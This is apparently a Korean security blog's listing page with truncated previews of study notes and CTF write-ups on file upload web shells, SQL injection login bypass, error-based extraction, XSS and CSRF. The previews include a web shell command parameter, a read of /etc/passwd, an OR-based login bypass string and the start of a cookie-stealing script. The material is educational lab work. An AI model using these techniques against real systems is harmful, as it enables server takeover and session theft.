본문 바로가기

hacking17

(File Upload CTF 풀이1) Web Shell File Upload CTF 1 - Web Shell 사전 정보 : 서버 내에 중요한 정보! flag를 찾아내세요! :) flag.txt 파일 안에 있습니다! 사전 정보는 하고 서버 내에 flag.txt 라는 파일 안에 있다고 flag가 있다고 합니다. 그리고 CTF 자체가 File upload이기 때문에 일단 파일 업로드할 수 있는 곳을 사이트에서 찾아야 합니다. 해당 웹 사이트에서 돌아다니다가 파일 업로드하는 곳을 찾았습니다. 회원가입하고 로그인해서 게시판에 들어가니 있었습니다. 이제 악성코드를 심은 파일을 업로드해 보겠습니다. ADDICT!ON.php라는 파일을 만들고 아래의 코드를 입력하고 저장합니다. (파일 이름은 개인의 취향에 따라..) 악성코드가 삽입된 파일을 파일 업로드하는 곳에서 파일 업.. 2023. 6. 2.
10주차 - 파일 업로드의 개념과 대응 방안 해당 게시글은 정보글이 아닌 공부 메모글입니다. 목차 1. 파일 업로드 2. Bypass Trick 3. 모의해킹 시 주의사항 1. 파일 업로드 아래의 코드 한 줄만으로도 서버를 장악할 수 있습니다. 1 - 1. Point 1. 웹 서버에서 실행할 수 있는 파일을 업로드합니다. 2. 업로드된 파일의 위치를 알아내야 합니다. 3. 업로드한 파일을 실행할 수 있어야 합니다. (웹 브라이저로 업로드한 파일을 URL 주소로 요청하면 됩니다.) 1 - 2. 서버 장악 Burp Suite에서 알아낸 URL 주소를 Repeater로 보내서 'cmd' 파라미터를 받게 할 수 있습니다. www.~~~/webshell.php?cmd=id 서버를 장악하면 가장 처음에 해보는 것은 cat+/etc/passwd로 확인합니다. .. 2023. 6. 1.
8주차 - XSS와 CRSF 해당 게시글은 정보글이 아닌 공부 메모글입니다. 목차 1. 강조사항 2. Anti XSS Bypass 3. XSS 대응 방안 4. CSRF 5. XSS와 CSRF의 차이 1. 강조사항 공격자 입장에서 할 수 있는 모든 공격을 생각해 보고 정리하고 해 보는 것이 중요합니다. 스스로 고민해 보는 것이 매우 중요합니다. 실제 모의해킹하러 나가면 해당 취약점이 매우 취약한지 별로 안 취약하다 갑론을박을 하는데... 사실 이건 실제로 해킹해서 결과를 보여주면 됩니다. 고객사가 보고서 보고 이거 왜 취약해?라고 생각이 들면 자신이 잘못한 것이라 생각해야 합니다. 모의해킹 2. Anti XSS Bypass XSS의 대응 방안은 원래 Black List 기반 필터링으로 했습니다. 방화벽 다음에 WAF(Web Appli.. 2023. 5. 18.
해킹이란 목차 1. 해킹 2. 화이트 해커가 하는 일 3. 화이트 해커의 현실성 1. 해킹 (Hacking) 타인의 시스템에 침입하는 기술을 의미합니다. 해킹의 정의는 워낙 광범위해서 말하는 사람마다 다르지만 대부분의 사람들이 불법적인 일이라고 생각합니다. 맞지만 다릅니다!! 해당 설명에 앞서 해커의 종류를 설명드리겠습니다. 해커는 보통 두 가지로 나뉩니다. Black - Hat Hacker (블랙 햇 해커) 명백히 상대방의 동의 없이 악의적인 행위로 해킹을 하는 사람을 블랙 해커라고 부릅니다. 여기서 말하는 악의적인 행위는 상대방의 시스템을 파괴하거나 동의 없이 권한을 이용하거나 정보를 탈취하는 등을 말합니다. 정식 명칭은 블랙 햇 해커가 맞지만 HAT(모자)를 생략해서 불리고, 블랙햇(Black hat), 크.. 2023. 5. 18.
7주차 XSS - Reflected, DOM Based 복습 XSS란? 클라이언트 측 코드를 삽입하는 공격기법입니다. (이건 짧기도 하니 거의 무조건 외우는 것이 좋습니다.) 모의해킹 실전에서 할 때 인터넷이나 다른 곳에서 배운 것만 가지고 이건 통하니깐 안전하지 않다 / 이건 안 통하니깐 안전하다고 선 긋고 포기하지 말고, 반드시 공격자 시점에서 최대한 할 수 있는 해킹을 해서 자신이 생각하지도 못하는 취약점을 찾도록 해야 합니다. 세션 탈취 (하) 쿠키 값을 가져오려면 JavaScript를 통해서 가져올 수밖에 없기 때문에 HTML 태그를 통해서는 가져올 수 없습니다. # 쿠키 받는 변수 생성 var cookie = document.cookie; # 이미지 태그를 통해서 쿠키를 받을 것이니 이미지 변수 생성 var img = new Image(); # 세.. 2023. 5. 11.
6주차 XSS 모의해킹 보고서 쓸 때 TIP 1. 폰트 통일 (스타일, 크기, 색깔) 글씨 컬러는 X 부각이 될 때만 굵은 글씨 2. 표지, 이름, 목차, 표지 번호, 사진과 표의 넓이는 통일하고 캡션 넣기 3. 풀이 과정을 디테일하게 4. 코드는 표에 넣어서 ※ 블라인드 SQLi 같은 경우는 1. 참 조건 / 거짓 조건 2. and ((select database())='normaltic') and 3. 블라인드 SQLi 파이썬 script를 실행했다. 지금은 코드를 넣고 실무에서는 길어지니 넣지 말아야 합니다. SQL Injection 정리 Q1. SQL Injection이 뭐에요? A1. 임의의 SQL 질의문을 삽입해서 실행하는 공격입니다. Q2. 시나리오 A2. 인증 우회, 데이터 추출 및 변조 등 web sh.. 2023. 5. 11.
(SQL Injection CTF 풀이2) Login Bypass 2 - 인증과 식별 2 SQL Injection CTF 2 - Login Bypass2 ※ 로그인 바이패스의 경우 SQL Injection CTF - DB 데이터 추출 이전의 문제입니다. 참고해주세요. 사전 정보 : normaltic2 계정으로 로그인해보자! 우리의 아이디/비밀번호 : mario / mariosuper 사이트 들어가 봅시다. 전에 했던 로그인 바이패스 1 CTF처럼 로그인해서 인증과 식별이 동시에 이루어 지는지 아니면 분리하는지 먼저 알아보도록 하겠습니다. 인증/식별 동시 or 분리에 대한 자세한 설명은 3주차 SQL 게시글, 로그인 바이패스 1 게시글에서 확인해보시기 바랍니다. 전에 했던 로그인 바이패스 1 방식인 인증/식별 분리 방식에서 사용하는 전략을 아래 화면과 같이 normaltic2' OR '1'='.. 2023. 4. 26.
(SQL Injection CTF 풀이1) Login Bypass 1 - 인증과 식별 1 SQL Injection CTF 1 - Login Bypass 1 ※ 로그인 바이패스의 경우 SQL Injection CTF - DB 데이터 추출 이전의 문제입니다. 참고해 주세요. 사전 정보 : normaltic1 계정으로 로그인해 보자! 우리의 아이디/비밀번호 : mario / mariosuper 사이트 들어가 봅시다. 로그인해서 인증과 식별이 동시에 이루어지는지 아니면 분리하는지 먼저 알아보도록 하겠습니다. SELECT [컬럼] FROM [테이블] WHERE id='???' AND pw='???'으로 이루어져 있다면 인증과 식별이 동시에 하는 방식일 것이고, SELECT [컬럼] FROM [테이블] WHERE id='???' 으로 이루어져 있다면 인증과 식별을 분리하는 방식일 것입니다. 제가 만약 .. 2023. 4. 26.
(SQL Injection CTF 풀이4) DB 데이터 추출 2 - Error Based SQL Injection SQL Injection CTF 4 - DB 데이터 추출 2 사전 정보 : 로그인 페이지를 만났다! 이 서버에 연결된 DB를 털어라! DB안에 있는 flag를 찾으세요! :) 일단 사이트를 들어가 봅시다. 전에 했던 CTF - DB 데이터 추출 1처럼 배운 순서대로 해보겠습니다. 1. 추리 로그인 같은 경우 DB 데이터를 안 띄워주는 방식입니다. 그 이유는 아래의 사진과 같이 로그인을 하면 서버에 ID와 Password을 쿠키에 담아서 요청을 보냅니다. 그럼 서버에 있는 WAS에서 DB의 데이터를 불러와서 비교하고, ID와 Password가 일치한지 확인합니다. 일치하면 로그인 성공을 응답하고, 일치하지 않으면 로그인 실패를 응답합니다. 클라이언트는 DB의 데이터를 전혀 받지 않습니다. DB 데이터를 안.. 2023. 4. 23.

// code block - line num // code block - copy // code block - lan